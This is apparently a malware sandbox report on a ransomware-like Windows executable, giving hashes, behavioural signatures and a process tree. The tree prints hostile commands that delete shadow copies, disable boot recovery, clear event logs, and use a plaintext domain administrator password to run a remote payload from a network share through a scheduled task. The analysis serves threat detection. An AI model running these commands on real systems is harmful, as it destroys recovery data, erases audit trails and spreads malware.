Analysis
-
max time kernel
149s -
max time network
115s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22-01-2021 10:17
Static task
static1
Behavioral task
behavioral1
Sample
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Resource
win10v20201028
General
-
Target
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
-
Size
1.0MB
-
MD5
3281b2d95e7123a429001400c10ebe28
-
SHA1
b97308ea9f9c410188d43c34a867fa42c9e9128e
-
SHA256
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1
-
SHA512
2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3212 3364 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1932 3364 cmd.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2848 bcdedit.exe 2712 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exedescription ioc process File opened (read-only) \??\I: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\J: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\L: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\O: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\T: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\U: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\H: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\G: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\V: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\B: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\N: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Q: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\R: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\S: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\X: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Y: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\Z: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\A: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\F: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\K: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\M: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\P: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\W: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe File opened (read-only) \??\E: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 187 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2688 WMIC.exe Token: SeSecurityPrivilege 2688 WMIC.exe Token: SeTakeOwnershipPrivilege 2688 WMIC.exe Token: SeLoadDriverPrivilege 2688 WMIC.exe Token: SeSystemProfilePrivilege 2688 WMIC.exe Token: SeSystemtimePrivilege 2688 WMIC.exe Token: SeProfSingleProcessPrivilege 2688 WMIC.exe Token: SeIncBasePriorityPrivilege 2688 WMIC.exe Token: SeCreatePagefilePrivilege 2688 WMIC.exe Token: SeBackupPrivilege 2688 WMIC.exe Token: SeRestorePrivilege 2688 WMIC.exe Token: SeShutdownPrivilege 2688 WMIC.exe Token: SeDebugPrivilege 2688 WMIC.exe Token: SeSystemEnvironmentPrivilege 2688 WMIC.exe Token: SeRemoteShutdownPrivilege 2688 WMIC.exe Token: SeUndockPrivilege 2688 WMIC.exe Token: SeManageVolumePrivilege 2688 WMIC.exe Token: 33 2688 WMIC.exe Token: 34 2688 WMIC.exe Token: 35 2688 WMIC.exe Token: 36 2688 WMIC.exe Token: SeIncreaseQuotaPrivilege 2688 WMIC.exe Token: SeSecurityPrivilege 2688 WMIC.exe Token: SeTakeOwnershipPrivilege 2688 WMIC.exe Token: SeLoadDriverPrivilege 2688 WMIC.exe Token: SeSystemProfilePrivilege 2688 WMIC.exe Token: SeSystemtimePrivilege 2688 WMIC.exe Token: SeProfSingleProcessPrivilege 2688 WMIC.exe Token: SeIncBasePriorityPrivilege 2688 WMIC.exe Token: SeCreatePagefilePrivilege 2688 WMIC.exe Token: SeBackupPrivilege 2688 WMIC.exe Token: SeRestorePrivilege 2688 WMIC.exe Token: SeShutdownPrivilege 2688 WMIC.exe Token: SeDebugPrivilege 2688 WMIC.exe Token: SeSystemEnvironmentPrivilege 2688 WMIC.exe Token: SeRemoteShutdownPrivilege 2688 WMIC.exe Token: SeUndockPrivilege 2688 WMIC.exe Token: SeManageVolumePrivilege 2688 WMIC.exe Token: 33 2688 WMIC.exe Token: 34 2688 WMIC.exe Token: 35 2688 WMIC.exe Token: 36 2688 WMIC.exe Token: SeIncreaseQuotaPrivilege 3632 WMIC.exe Token: SeSecurityPrivilege 3632 WMIC.exe Token: SeTakeOwnershipPrivilege 3632 WMIC.exe Token: SeLoadDriverPrivilege 3632 WMIC.exe Token: SeSystemProfilePrivilege 3632 WMIC.exe Token: SeSystemtimePrivilege 3632 WMIC.exe Token: SeProfSingleProcessPrivilege 3632 WMIC.exe Token: SeIncBasePriorityPrivilege 3632 WMIC.exe Token: SeCreatePagefilePrivilege 3632 WMIC.exe Token: SeBackupPrivilege 3632 WMIC.exe Token: SeRestorePrivilege 3632 WMIC.exe Token: SeShutdownPrivilege 3632 WMIC.exe Token: SeDebugPrivilege 3632 WMIC.exe Token: SeSystemEnvironmentPrivilege 3632 WMIC.exe Token: SeRemoteShutdownPrivilege 3632 WMIC.exe Token: SeUndockPrivilege 3632 WMIC.exe Token: SeManageVolumePrivilege 3632 WMIC.exe Token: 33 3632 WMIC.exe Token: 34 3632 WMIC.exe Token: 35 3632 WMIC.exe Token: 36 3632 WMIC.exe Token: SeIncreaseQuotaPrivilege 3632 WMIC.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.execmd.execmd.execmd.exedescription pid process target process PID 3108 wrote to memory of 2688 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3108 wrote to memory of 2688 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3108 wrote to memory of 2688 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3108 wrote to memory of 3632 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3108 wrote to memory of 3632 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3108 wrote to memory of 3632 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe WMIC.exe PID 3212 wrote to memory of 556 3212 cmd.exe WMIC.exe PID 3212 wrote to memory of 556 3212 cmd.exe WMIC.exe PID 1932 wrote to memory of 1096 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 1096 1932 cmd.exe wevtutil.exe PID 3108 wrote to memory of 2112 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 3108 wrote to memory of 2112 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 3108 wrote to memory of 2112 3108 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe cmd.exe PID 1932 wrote to memory of 728 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 728 1932 cmd.exe wevtutil.exe PID 2112 wrote to memory of 3912 2112 cmd.exe WMIC.exe PID 2112 wrote to memory of 3912 2112 cmd.exe WMIC.exe PID 2112 wrote to memory of 3912 2112 cmd.exe WMIC.exe PID 1932 wrote to memory of 2844 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2844 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2752 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2752 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 1764 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 1764 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 3292 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 3292 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2060 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2060 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2116 1932 cmd.exe wevtutil.exe PID 1932 wrote to memory of 2116 1932 cmd.exe wevtutil.exe PID 3212 wrote to memory of 2848 3212 cmd.exe bcdedit.exe PID 3212 wrote to memory of 2848 3212 cmd.exe bcdedit.exe PID 3212 wrote to memory of 2712 3212 cmd.exe bcdedit.exe PID 3212 wrote to memory of 2712 3212 cmd.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive2⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil cl "security"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "windows powershell"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "security"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Application"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "HardwareEvents"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "System"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Setup"2⤵
-
C:\Windows\system32\wevtutil.exewevtutil cl "Setup"2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/556-4-0x0000000000000000-mapping.dmp
-
memory/728-7-0x0000000000000000-mapping.dmp
-
memory/1096-5-0x0000000000000000-mapping.dmp
-
memory/1764-11-0x0000000000000000-mapping.dmp
-
memory/2060-13-0x0000000000000000-mapping.dmp
-
memory/2112-6-0x0000000000000000-mapping.dmp
-
memory/2116-14-0x0000000000000000-mapping.dmp
-
memory/2688-2-0x0000000000000000-mapping.dmp
-
memory/2712-16-0x0000000000000000-mapping.dmp
-
memory/2752-10-0x0000000000000000-mapping.dmp
-
memory/2844-9-0x0000000000000000-mapping.dmp
-
memory/2848-15-0x0000000000000000-mapping.dmp
-
memory/3292-12-0x0000000000000000-mapping.dmp
-
memory/3632-3-0x0000000000000000-mapping.dmp
-
memory/3912-8-0x0000000000000000-mapping.dmp